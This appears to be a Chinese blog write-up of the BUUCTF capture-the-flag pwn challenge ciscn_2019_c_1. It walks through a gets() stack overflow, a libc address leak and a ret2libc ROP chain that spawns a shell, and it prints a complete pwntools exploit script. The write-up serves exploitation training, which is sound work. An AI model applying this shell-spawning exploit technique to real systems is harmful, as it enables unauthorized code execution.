BUUCTF ciscn_2019_c_1 题解

已于 2023-08-20 22:09:10 修改
阅读量229 收藏 3
点赞数
文章标签: 网络安全 python
于 2023-08-20 21:58:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51802916/article/details/132395704
版权

ciscn_2019_c_1 题解

用checksec检查文件安全属性

在这里插入图片描述

  可以看到是64位程序,栈上开启了不可执行保护,但是没有栈检测标志,同时PIE也关闭了,推测需要进行缓冲区溢出.

使用IDA反汇编程序

在这里插入图片描述
  从反汇编后的代码可以看出这个程序是一个所谓的加密机,关键漏洞代码位于encrypt()内。
在这里插入图片描述
  这个函数中有我们非常熟悉的gets(),这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。

获取libc基址

   接下来就需要寻找system()的函数构造POC了。但是经过我们仔细查找,程序中没有任何可以利用的函数,而且也没有关于shell的字符串,因此我们只能寄希望于libc了,我们可以借助puts()函数将puts()的真实装载地址给打印出来,然后利用LibcSearcher库搜索满足条件的libc库。
为了构造payload,我们还需要一些gadget来帮助我们完成函数的调用,我们可以利用ROPgadget工具来帮我们查找,具体指令如下:

ROPgadget --binary ciscn_2019_c_1 --only 'pop|ret'

在这里插入图片描述
在amd64架构下,函数调用的第一个参数存放在rdi中,因此我们需要pop rdi;ret这条指令来帮助我们给函数参数赋值。
payload如下:

from pwn import  *
from LibcSearcher import *

context.update(arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019_c_1")
r=process('./ciscn_2019_c_1')
enc_addr=0x4009A0
pop_rdi_ret=0x0000000000400c83 
plt=elf.plt['puts']
got=elf.got['puts']
payload= b'\x00'*(0x50+8)+p64(pop_rdi_ret)+p64(got)+p64(plt)+p64(enc_addr)
r.sendline(b'1')
r.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)
r.recvlines(2)
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
sysaddr=libcbase+libc.dump("system")
shell=libcbase+libc.dump("str_bin_sh")

这里需要用到plt表和外部函数调用的一些知识,读者可以自行查阅。在这里我们将got表中puts()表项的地址赋给了rdi,然后交给puts打印,puts()会答应puts()表项保存的值,即libc中puts()真实的装载地址,最后我们在返回地址中填入encrypt()的地址,程序又会重新回到encrypt()函数中。当得到真实装载地址后,我们可以利用LibcSearcher库进行搜索,得到符合条件的libc,然后可以算出虚拟内存中libc装载的基地址。
在这里插入图片描述
这里我们随便选择一个即可,如果后面程序报错就更换一个!

getshell

得到libc的基址后,我们就可以利用 LibcSearcher获取system()的装载地址和shell字符串的装载地址,然后构造POC了。

ret=0x00000000004006b9
payload= b'\x00'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(shell)+p64(sysaddr)
r.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)
r.interactive()

这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。是否增加ret指令需要依据实际情况来判断,我们可以两种情况都尝试一下。

完整代码

from pwn import  *
from LibcSearcher import *

context.update(arch='amd64',log_level='debug')
elf=ELF("./ciscn_2019_c_1")
r=process('./ciscn_2019_c_1')
enc_addr=0x4009A0
pop_rdi_ret=0x0000000000400c83 
plt=elf.plt['puts']
got=elf.got['puts']
payload= b'\x00'*(0x50+8)+p64(pop_rdi_ret)+p64(got)+p64(plt)+p64(enc_addr)
r.sendline(b'1')
r.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)
r.recvlines(2)
addr=u64(r.recv(6).ljust(0x8,b"\x00"))
libc=LibcSearcher("puts",addr)
libcbase=addr-libc.dump("puts")
sysaddr=libcbase+libc.dump("system")
shell=libcbase+libc.dump("str_bin_sh")
ret=0x00000000004006b9
payload= b'\x00'*(0x50+8)+p64(ret)+p64(pop_rdi_ret)+p64(shell)+p64(sysaddr)
r.sendlineafter(b'Input your Plaintext to be encrypted\n',payload)
r.interactive()

在这里插入图片描述
这题我尝试了好几个libc才找到正确的libc,麻了: (

塵XI
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5855
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ctf【ciscn_2019_c_1】
HUANGliang_的博客
10-29 258
ciscn_2019_c_1 ret2libc (1)由于存在 v0 >= strlen(s)的判断,而strlen是以s中\x00为判断依据判断s字符串长度,因此可以在s首部存入\x00避开加密程序 (2)找到execve("/bin/sh") 在libc中的偏移量后需要通过泄露puts地址来计算libc的基地址,puts的真实地址存在puts@got表中,函数在libc文件中。可以通过puts函数泄露puts的地址然后计算加载的libc文件的基地址,最后计算execve("/bin/sh")的实际地址
ciscn_2019_c_1[BUUCTF]
最新发布
moonlightsunshin的博客
05-03 562
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 760
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6852
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 1026
ciscn_2019_c_1【BUUCTF
ciscn_2019_c_1
weixin_56301399的博客
07-21 1495
ret2libc来泄露libc基址
acm.rar_浙江大学 ACM 题解
09-24
【标题】"acm.rar_浙江大学 ACM 题解" 涵盖的是关于浙江大学在ACM(国际大学生程序设计竞赛)方面的训练资料和解题思路。这些资源通常包括历年的竞赛题目、官方解答以及参赛者们分享的解题策略,旨在帮助学习者提升...
leetcode题解_leetcode_leetcode题解_
09-29
《LeetCode题解》是广大程序员提升算法能力和解决实际编程问题的重要资源库。它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括...
cpp.rar_tyvj_tyvj 1268 c
09-20
首先,"tyvj 1268 c"可能是指tyvj平台上的一道题目,编号为1268,且该题目的解决方案使用了C语言。在编程竞赛中,参赛者通常需要编写程序来解决特定的问题,这些问题通常涉及算法和数据结构。这道题目的具体细节可能...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
《LeetCode部分题解——Java程序员的进阶之路》 在程序员的世界里,LeetCode是一个不可或缺的刷题平台,尤其对于Java程序员来说,它提供了大量的编程挑战,旨在提升算法理解、数据结构掌握以及问题解决能力。这个名...
ciscn_2019_c_1(ret2libc)
qq_53928256的博客
10-08 757
综上,我们可以构造第一段payload为(payload首部加入‘\0’是为了绕过encrypt函数,防止输入的字符串加密而变化,strlen()函数遇‘\0’截止)故我们可以计算加载程序的基址,通过基址和各个函数以及字符串的偏移量可以计算各个函数以及字符串在程序中的地址。通过已经调用过的函数去泄露它在程序中的地址,然后利用地址末尾的3个字节,去找到该程序所用的libc版本;随后我们可以通过得到的libc版本来查询对应字符串或函数的偏移地址,也包括puts函数的偏移地址;
ciscn_2019_c_1(ret2libc)
m0_62322730的博客
04-19 206
ciscn_2019_c_1(ret2libc) 萌新跟着别人的文章复现滴~还有很多疑问,本文有任何问题请指正。
buuctf ciscn_2019_c_1 wp
yajuanpi4899的博客
01-16 584
目录 一、题目速阅 二、知识要点 三、题解payload 一、题目速阅 拿到题目,进行check └─$ checksec ciscn_2019_c_1 1 ⚙ [*] '/home/kali/Desktop/prac/ciscn_2019_c_1' Arch: amd64-64-little R
"复变函数题解_2019秋 学生总结"。
复平面上三个相异且不共线的点z1, z2, z3构成一个三角形∆z1z2z3。我们要求出这个三角形的外接圆圆心z0的坐标,并证明当且仅当z0 = z1+z2+z3时,∆z1z2z3为正三角形,并求出外接圆的半径r。 根据外心的定义,外接圆...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值